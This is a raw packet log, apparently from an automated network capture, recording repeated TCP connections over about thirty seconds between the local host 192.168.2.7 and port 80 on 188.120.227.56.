Dec 10, 2024 07:33:59.802098989 CET	80	49895	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:59.802124977 CET	80	49895	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:59.807841063 CET	49897	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:33:59.927201033 CET	80	49897	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:59.927237988 CET	80	49897	188.120.227.56	192.168.2.7
Dec 10, 2024 07:33:59.927251101 CET	80	49897	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:00.667467117 CET	80	49895	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:00.713707924 CET	49895	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:00.800870895 CET	80	49897	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:00.854324102 CET	49897	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:00.903552055 CET	80	49895	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:00.948064089 CET	49895	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:01.035825014 CET	80	49897	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:01.088712931 CET	49897	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:01.163827896 CET	49895	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:01.163917065 CET	49897	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:01.164160013 CET	49902	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:01.283461094 CET	80	49902	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:01.283566952 CET	49902	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:01.283660889 CET	80	49895	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:01.283725023 CET	49895	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:01.283853054 CET	49902	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:01.284167051 CET	80	49897	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:01.284221888 CET	49897	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:01.403057098 CET	80	49902	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:01.635746956 CET	49902	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:01.885533094 CET	49902	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:01.889216900 CET	80	49902	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:01.889225960 CET	80	49902	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:01.889235020 CET	80	49902	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:02.004975080 CET	80	49902	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:02.611169100 CET	80	49902	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:02.651212931 CET	49902	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:02.981307030 CET	80	49902	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:03.026154041 CET	49902	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:03.100610018 CET	49908	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:03.220052004 CET	80	49908	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:03.220197916 CET	49908	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:03.220360041 CET	49908	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:03.339622974 CET	80	49908	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:03.573149920 CET	49908	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:03.692619085 CET	80	49908	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:03.692632914 CET	80	49908	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:03.692712069 CET	80	49908	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:04.555869102 CET	80	49908	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:04.604341984 CET	49908	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:04.791590929 CET	80	49908	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:04.838660002 CET	49908	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:04.922044039 CET	49908	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:04.922251940 CET	49912	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:05.041554928 CET	80	49912	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:05.041635990 CET	49912	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:05.041681051 CET	80	49908	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:05.041732073 CET	49908	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:05.041872025 CET	49912	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:05.161227942 CET	80	49912	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:05.401349068 CET	49912	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:05.521295071 CET	80	49912	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:05.521311045 CET	80	49912	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:05.521328926 CET	80	49912	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:05.917695999 CET	49912	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:05.917695045 CET	49916	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:06.038351059 CET	80	49916	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:06.038430929 CET	49916	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:06.038563967 CET	49916	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:06.041060925 CET	49917	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:06.059614897 CET	80	49912	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:06.059672117 CET	49912	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:06.157943964 CET	80	49916	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:06.160382986 CET	80	49917	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:06.160470009 CET	49917	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:06.160670996 CET	49917	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:06.279854059 CET	80	49917	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:06.385684013 CET	49916	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:06.505109072 CET	80	49916	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:06.505135059 CET	80	49916	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:06.510899067 CET	49917	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:06.630371094 CET	80	49917	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:06.630404949 CET	80	49917	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:06.630460978 CET	80	49917	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:07.379029036 CET	80	49916	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:07.432589054 CET	49916	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:07.488444090 CET	80	49917	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:07.541786909 CET	49917	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:07.611588001 CET	80	49916	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:07.666790962 CET	49916	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:07.727502108 CET	80	49917	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:07.776165962 CET	49917	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:07.850689888 CET	49916	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:07.851026058 CET	49917	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:07.851114988 CET	49922	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:07.970415115 CET	80	49922	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:07.970428944 CET	80	49916	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:07.970545053 CET	49916	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:07.970573902 CET	49922	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:07.970789909 CET	49922	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:07.970875978 CET	80	49917	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:07.970925093 CET	49917	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:08.090101004 CET	80	49922	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:08.323245049 CET	49922	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:08.442681074 CET	80	49922	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:08.442711115 CET	80	49922	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:08.442815065 CET	80	49922	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:09.297036886 CET	80	49922	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:09.338716984 CET	49922	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:09.535561085 CET	80	49922	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:09.588716984 CET	49922	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:09.659785032 CET	49902	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:09.664866924 CET	49928	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:09.784292936 CET	80	49928	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:09.784382105 CET	49928	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:09.784560919 CET	49928	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:09.903826952 CET	80	49928	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:10.135962009 CET	49928	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:10.255435944 CET	80	49928	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:10.255475998 CET	80	49928	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:10.255501032 CET	80	49928	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:11.150826931 CET	80	49928	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:11.198035955 CET	49928	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:11.526758909 CET	80	49928	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:11.573054075 CET	49928	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:11.649454117 CET	49934	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:11.649508953 CET	49928	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:11.768929958 CET	80	49934	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:11.769090891 CET	49934	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:11.769201040 CET	80	49928	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:11.769272089 CET	49928	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:11.772135973 CET	49934	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:11.891916990 CET	80	49934	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:12.215055943 CET	49934	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:12.334743977 CET	80	49934	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:12.334764004 CET	80	49934	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:12.334774017 CET	80	49934	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:12.620990992 CET	49936	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:12.620995045 CET	49934	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:12.740269899 CET	80	49936	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:12.740421057 CET	49936	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:12.740551949 CET	49936	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:12.741374016 CET	49937	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:12.783384085 CET	80	49934	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:12.794673920 CET	80	49934	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:12.794738054 CET	49934	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:12.859719038 CET	80	49936	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:12.860585928 CET	80	49937	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:12.860670090 CET	49937	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:12.860826969 CET	49937	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:12.980045080 CET	80	49937	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:13.089066029 CET	49936	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:13.208619118 CET	80	49936	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:13.208635092 CET	80	49936	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:13.213871956 CET	49937	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:13.333476067 CET	80	49937	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:13.333523989 CET	80	49937	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:13.333632946 CET	80	49937	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:14.066977024 CET	80	49936	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:14.119959116 CET	49936	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:14.199546099 CET	80	49937	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:14.244946003 CET	49937	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:14.299182892 CET	80	49936	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:14.338691950 CET	49936	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:14.431296110 CET	80	49937	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:14.479309082 CET	49937	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:14.822573900 CET	49922	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:14.827788115 CET	49936	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:14.827850103 CET	49937	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:14.828325987 CET	49943	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:14.947717905 CET	80	49936	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:14.947813988 CET	80	49943	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:14.947868109 CET	49936	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:14.947911978 CET	49943	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:14.948112011 CET	80	49937	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:14.948174953 CET	49943	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:14.948188066 CET	49937	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:15.067589998 CET	80	49943	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:15.307646036 CET	49943	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:15.427201033 CET	80	49943	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:15.427328110 CET	80	49943	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:15.427341938 CET	80	49943	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:16.275516987 CET	80	49943	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:16.323052883 CET	49943	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:16.511723042 CET	80	49943	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:16.557420015 CET	49943	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:16.631786108 CET	49943	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:16.632041931 CET	49948	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:16.751548052 CET	80	49948	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:16.751713037 CET	49948	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:16.751792908 CET	80	49943	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:16.751844883 CET	49943	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:16.752676964 CET	49948	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:16.871912003 CET	80	49948	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:17.105823040 CET	49948	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:17.225428104 CET	80	49948	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:17.225441933 CET	80	49948	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:17.225500107 CET	80	49948	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:18.090622902 CET	80	49948	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:18.135591030 CET	49948	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:18.323276043 CET	80	49948	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:18.342106104 CET	49948	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:18.460016966 CET	49954	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:18.461836100 CET	80	49948	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:18.461930037 CET	49948	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:18.579513073 CET	80	49954	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:18.579634905 CET	49954	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:18.579834938 CET	49954	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:18.699134111 CET	80	49954	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:18.932566881 CET	49954	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:19.052525997 CET	80	49954	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:19.052542925 CET	80	49954	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:19.052561045 CET	80	49954	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:19.308525085 CET	49954	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:19.308526039 CET	49956	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:19.428016901 CET	80	49956	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:19.428174973 CET	49956	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:19.428313017 CET	49956	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:19.430977106 CET	49958	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:19.471345901 CET	80	49954	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:19.547728062 CET	80	49956	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:19.550322056 CET	80	49958	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:19.550415993 CET	49958	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:19.550616026 CET	49958	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:19.594803095 CET	80	49954	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:19.594873905 CET	49954	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:19.670042038 CET	80	49958	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:19.776367903 CET	49956	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:19.895873070 CET	80	49956	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:19.895906925 CET	80	49956	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:19.901294947 CET	49958	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:20.020823002 CET	80	49958	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:20.020843983 CET	80	49958	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:20.020864964 CET	80	49958	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:20.760848999 CET	80	49956	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:20.807459116 CET	49956	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:20.877772093 CET	80	49958	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:20.932461023 CET	49958	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:20.995331049 CET	80	49956	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:21.041879892 CET	49956	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:21.111618042 CET	80	49958	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:21.166800976 CET	49958	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:21.226291895 CET	49956	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:21.226291895 CET	49958	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:21.226609945 CET	49963	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:21.345868111 CET	80	49963	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:21.346009016 CET	80	49956	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:21.346110106 CET	49956	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:21.346122980 CET	49963	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:21.346349001 CET	49963	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:21.346671104 CET	80	49958	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:21.348136902 CET	49958	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:21.465662003 CET	80	49963	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:21.698158026 CET	49963	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:21.817833900 CET	80	49963	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:21.817852974 CET	80	49963	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:21.817864895 CET	80	49963	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:22.675987959 CET	80	49963	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:22.729324102 CET	49963	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:22.911427975 CET	80	49963	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:22.963743925 CET	49963	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:23.038984060 CET	49968	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:23.158447981 CET	80	49968	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:23.158615112 CET	49968	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:23.165843010 CET	49968	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:23.285273075 CET	80	49968	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:23.524880886 CET	49968	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:23.644316912 CET	80	49968	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:23.644330978 CET	80	49968	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:23.644341946 CET	80	49968	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:24.521224976 CET	80	49968	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:24.573126078 CET	49968	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:24.755350113 CET	80	49968	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:24.807559967 CET	49968	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:24.882318020 CET	49968	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:24.882527113 CET	49974	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:25.002212048 CET	80	49974	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:25.002540112 CET	49974	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:25.002540112 CET	49974	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:25.002697945 CET	80	49968	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:25.002758026 CET	49968	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:25.122157097 CET	80	49974	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:25.354526043 CET	49974	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:25.474015951 CET	80	49974	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:25.474031925 CET	80	49974	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:25.474041939 CET	80	49974	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:26.012464046 CET	49977	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:26.012775898 CET	49974	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:26.132030010 CET	49978	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:26.132292986 CET	80	49977	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:26.132590055 CET	80	49974	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:26.132690907 CET	49974	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:26.132821083 CET	49977	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:26.132821083 CET	49977	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:26.251785040 CET	80	49978	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:26.251954079 CET	49978	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:26.252203941 CET	80	49977	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:26.330064058 CET	49978	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:26.452858925 CET	80	49978	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:26.479432106 CET	49977	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:26.598934889 CET	80	49977	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:26.598999023 CET	80	49977	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:26.702548981 CET	49978	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:26.822690010 CET	80	49978	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:26.822784901 CET	80	49978	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:26.822794914 CET	80	49978	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:27.587737083 CET	80	49977	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:27.587827921 CET	80	49978	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:27.635683060 CET	49978	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:27.635720015 CET	49977	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:27.711390018 CET	80	49977	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:27.760586977 CET	49977	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:27.811542988 CET	80	49978	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:27.854299068 CET	49978	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:27.925776958 CET	49963	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:27.930789948 CET	49978	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:27.930789948 CET	49977	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:27.931132078 CET	49983	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:28.050385952 CET	80	49983	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:28.050400972 CET	80	49977	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:28.050543070 CET	49977	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:28.050549030 CET	49983	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:28.050757885 CET	49983	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:28.050896883 CET	80	49978	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:28.050937891 CET	49978	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:28.170023918 CET	80	49983	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:28.401644945 CET	49983	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:28.521215916 CET	80	49983	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:28.521239042 CET	80	49983	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:28.521251917 CET	80	49983	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:29.377228022 CET	80	49983	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:29.432449102 CET	49983	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:29.611670971 CET	80	49983	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:29.666815996 CET	49983	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:29.727550983 CET	49988	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:29.847019911 CET	80	49988	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:29.847142935 CET	49988	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:29.847342968 CET	49988	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:29.967654943 CET	80	49988	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:30.198214054 CET	49988	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:30.317620039 CET	80	49988	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:30.317632914 CET	80	49988	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:30.317655087 CET	80	49988	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:31.174575090 CET	80	49988	188.120.227.56	192.168.2.7
